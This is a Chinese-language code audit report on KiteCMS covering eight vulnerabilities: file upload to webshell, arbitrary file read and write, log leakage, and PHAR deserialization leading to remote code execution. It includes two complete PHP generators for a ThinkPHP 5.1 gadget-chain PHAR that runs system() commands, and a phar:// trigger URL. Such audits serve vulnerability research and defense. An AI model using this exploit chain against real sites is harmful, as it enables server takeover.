KiteCMS PHP代码审计与漏洞分析报告<\/h1>

环境搭建<\/h2>

使用phpstudy搭建环境<\/li>
进入install目录<\/li>
输入数据库名和密码完成安装<\/li>

成功搭建后访问后台页面<\/li> <\/ol>

漏洞分析<\/h2>

1. 文件上传漏洞（后台）<\/h3>

漏洞位置<\/strong>：后台配置-上传功能<\/p>

代码分析<\/strong>：<\/p>

上传功能调用了uploadFile()<\/code>方法<\/li>
ThinkPHP框架使用Request::file<\/code>接收上传文件<\/li>
上传类型通过Content-Type<\/code>获取，使用check()<\/code>方法进行后缀和大小检测<\/li>
最终调用Local<\/code>下的upload()<\/code>实现文件上传<\/li> <\/ul> 利用步骤<\/strong>：<\/p> 通过配置将允许上传文件后缀(如.php)写入数据库<\/li> 通过后台任意上传点上传.php文件<\/li> <\/ol> 2. 任意文件写入漏洞<\/h3> 漏洞位置<\/strong>：后台功能中使用file_put_contents()<\/code>函数<\/p> 代码分析<\/strong>：<\/p> html<\/code>参数完全可控，作为写入内容<\/li> htmlspecialchars_decode()<\/code>函数还原实体编码<\/li> $rootpath<\/code>参数中的$path<\/code>通过param()<\/code>接收，可控<\/li> 导致可控制写入路径和内容<\/li> <\/ul> 3. 任意文件读取漏洞<\/h3> 漏洞位置<\/strong>：与文件写入漏洞同一方法中的file_get_contents()<\/code><\/p> 代码分析<\/strong>：<\/p> 非POST请求时直接读取$rootpath<\/code><\/li> 由于$path<\/code>可控，导致任意文件读取<\/li> <\/ul> 4. PHAR反序列化漏洞<\/h3> 漏洞原理<\/strong>：<\/p> 利用PHAR文件格式的反序列化漏洞执行恶意代码<\/li> PHAR文件可包含多个PHP脚本和相关资源<\/li> 恶意构造数据可触发反序列化对象的构造函数执行任意代码<\/li> <\/ul> 危害<\/strong>：<\/p> 远程代码执行<\/li> 信息泄露<\/li> 数据篡改<\/li> <\/ul> 利用链<\/strong>：ThinkPHP 5.1反序列化利用链<\/p> PHAR文件生成代码<\/strong>：<\/p> <?<\/span>php<\/span> <\/span><\/span>namespace<\/span> think\process\pipes<\/span> { <\/span><\/span> class<\/span> Windows<\/span> { <\/span><\/span> private<\/span> $files; <\/span><\/span> public<\/span> function<\/span> __construct($files) { <\/span><\/span> $this-><\/span>files<\/span> =<\/span> [$files]; <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span> <\/span><\/span>namespace<\/span> think\model\concern<\/span> { <\/span><\/span> trait<\/span> Conversion<\/span> { } <\/span><\/span> trait<\/span> Attribute<\/span> { <\/span><\/span> private<\/span> $data; <\/span><\/span> private<\/span> $withAttr =<\/span> ["v"<\/span> =><\/span> "system"<\/span>]; <\/span><\/span> public<\/span> function<\/span> get<\/span>() { <\/span><\/span> $this-><\/span>data<\/span> =<\/span> ["v"<\/span> =><\/span> "calc"<\/span>]; <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span> <\/span><\/span>namespace<\/span> think<\/span> { <\/span><\/span> abstract<\/span> class<\/span> Model<\/span> { <\/span><\/span> use<\/span> model\concern\Attribute<\/span>; <\/span><\/span> use<\/span> model\concern\Conversion<\/span>; <\/span><\/span> } <\/span><\/span>} <\/span><\/span> <\/span><\/span>namespace<\/span> think\model<\/span>{ <\/span><\/span> use<\/span> think\Model<\/span>; <\/span><\/span> class<\/span> Pivot<\/span> extends<\/span> Model<\/span> { <\/span><\/span> public<\/span> function<\/span> __construct() { <\/span><\/span> $this-><\/span>get<\/span>(); <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span> <\/span><\/span>namespace<\/span> { <\/span><\/span> $conver =<\/span> new<\/span> think\model\Pivot<\/span>(); <\/span><\/span> $a =<\/span> new<\/span> think\process\pipes\Windows<\/span>($conver); <\/span><\/span> @<\/span>unlink<\/span>("phar.phar"<\/span>); <\/span><\/span> $phar =<\/span> new<\/span> Phar<\/span>("phar.phar"<\/span>); \/\/ 后缀名必须为phar <\/span><\/span><\/span><\/span> $phar-><\/span>startBuffering<\/span>(); <\/span><\/span> $phar-><\/span>setStub<\/span>("GIF89a<?php __HALT_COMPILER(); ?>"<\/span>); \/\/ 设置stub <\/span><\/span><\/span><\/span> $phar-><\/span>setMetadata<\/span>($a); \/\/ 将自定义的meta-data存入manifest <\/span><\/span><\/span><\/span> $phar-><\/span>addFromString<\/span>("test.txt"<\/span>, "test"<\/span>); \/\/ 添加要压缩的文件 <\/span><\/span><\/span><\/span> $phar-><\/span>stopBuffering<\/span>(); <\/span><\/span>} <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre>利用步骤<\/strong>：<\/p> 生成phar文件（需设置php.ini中phar.readonly=Off<\/code>）<\/li> 修改后缀为.jpg上传<\/li> 通过可控参数触发phar反序列化（如is_dir()<\/code>调用）<\/li> <\/ol> 5. 日志敏感信息泄露<\/h3> 漏洞条件<\/strong>：<\/p> \/config\/log.php<\/code>中开启日志记录<\/li> config\/app.php<\/code>中开启调试模式(app_debug<\/code>)<\/li> <\/ul> 影响<\/strong>：<\/p> 操作记录<\/li> SQL执行语句<\/li> 流量信息等<\/li> <\/ul> 利用方法<\/strong>：访问\/runtime\/log<\/code>目录，通过修改日期获取不同日志<\/p> 6. 任意文件上传（前台）<\/h3> 漏洞位置<\/strong>：application\/member\/controller\/Upload.php<\/code><\/p> 代码分析<\/strong>：<\/p> 前台用户注册后可使用文件上传功能<\/li> 上传处理逻辑与后台类似<\/li> <\/ul> 利用步骤<\/strong>：<\/p> 注册前台用户<\/li> 进入会员中心发布信息<\/li> 修改.png文件为.php上传<\/li> 成功获取webshell<\/li> <\/ol> 7. PHAR RCE 2<\/h3> 漏洞位置<\/strong>：scanfile()<\/code>方法中的is_dir()<\/code>调用<\/p> 利用链<\/strong>：<\/p> <?<\/span>php<\/span> <\/span><\/span>namespace<\/span> think\process\pipes<\/span> { <\/span><\/span> class<\/span> Windows<\/span> { <\/span><\/span> private<\/span> $files; <\/span><\/span> public<\/span> function<\/span> __construct($files) { <\/span><\/span> $this-><\/span>files<\/span> =<\/span> [$files]; <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span> <\/span><\/span>namespace<\/span> think\model\concern<\/span> { <\/span><\/span> trait<\/span> Conversion<\/span> { } <\/span><\/span> trait<\/span> Attribute<\/span> { <\/span><\/span> private<\/span> $data; <\/span><\/span> private<\/span> $withAttr =<\/span> ["lin"<\/span> =><\/span> "system"<\/span>]; <\/span><\/span> public<\/span> function<\/span> get<\/span>() { <\/span><\/span> $this-><\/span>data<\/span> =<\/span> ["lin"<\/span> =><\/span> "whoami"<\/span>]; <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span> <\/span><\/span>namespace<\/span> think<\/span> { <\/span><\/span> abstract<\/span> class<\/span> Model<\/span> { <\/span><\/span> use<\/span> model\concern\Attribute<\/span>; <\/span><\/span> use<\/span> model\concern\Conversion<\/span>; <\/span><\/span> } <\/span><\/span>} <\/span><\/span> <\/span><\/span>namespace<\/span> think\model<\/span>{ <\/span><\/span> use<\/span> think\Model<\/span>; <\/span><\/span> class<\/span> Pivot<\/span> extends<\/span> Model<\/span> { <\/span><\/span> public<\/span> function<\/span> __construct() { <\/span><\/span> $this-><\/span>get<\/span>(); <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span> <\/span><\/span>namespace<\/span> { <\/span><\/span> $conver =<\/span> new<\/span> think\model\Pivot<\/span>(); <\/span><\/span> $a =<\/span> new<\/span> think\process\pipes\Windows<\/span>($conver); <\/span><\/span> @<\/span>unlink<\/span>("phar.phar"<\/span>); <\/span><\/span> $phar =<\/span> new<\/span> Phar<\/span>("phar.phar"<\/span>); <\/span><\/span> $phar-><\/span>startBuffering<\/span>(); <\/span><\/span> $phar-><\/span>setStub<\/span>("GIF89a<?php __HALT_COMPILER(); ?>"<\/span>); <\/span><\/span> $phar-><\/span>setMetadata<\/span>($a); <\/span><\/span> $phar-><\/span>addFromString<\/span>("test.txt"<\/span>, "test"<\/span>); <\/span><\/span> $phar-><\/span>stopBuffering<\/span>(); <\/span><\/span>} <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre>利用步骤<\/strong>：<\/p> 生成phar文件并改后缀为.png上传<\/li> 访问：http:\/\/127.0.0.1\/admin\/admin\/scanFilesForTree?dir=phar:\/\/.\/upload\/20230308\/1c57fd5e8abbd8ce9e6715c28227a95f.png<\/code><\/li> <\/ol> 8. PHAR RCE 3<\/h3> 漏洞位置<\/strong>：application\/admin\/controller\/Upload.php<\/code>中的uploadFile<\/code>方法<\/p> 代码分析<\/strong>：<\/p> 调用$uploadObj->upload<\/code>方法<\/li> 默认使用local<\/code>处理器（可后台配置）<\/li> application\/common\/model\/upload\/driver\/Local.php<\/code>中的upload<\/code>方法直接调用is_dir<\/code><\/li> $uploadPath<\/code>从数据库获取，后台可控<\/li> <\/ul> 利用步骤<\/strong>：<\/p> 后台修改配置使$this->config['upload_path']<\/code>为phar<\/li> 触发phar反序列化<\/li> <\/ol> 防护建议<\/h2> 文件上传：<\/p> 严格限制上传文件类型<\/li> 使用白名单验证<\/li> 文件内容检测<\/li> <\/ul> <\/li> 文件操作：<\/p> 对用户输入路径进行严格校验<\/li> 限制文件操作目录<\/li> <\/ul> <\/li> PHAR反序列化：<\/p> 禁用不必要的反序列化<\/li> 更新ThinkPHP框架<\/li> 对反序列化对象进行严格控制<\/li> <\/ul> <\/li> 日志安全：<\/p> 生产环境关闭调试模式<\/li> 限制日志目录访问<\/li> 定期清理日志<\/li> <\/ul> <\/li> 输入验证：<\/p> 对所有用户输入进行过滤和验证<\/li> 使用PHP反序列化检测工具检查潜在漏洞<\/li> <\/ul> <\/li> <\/ol>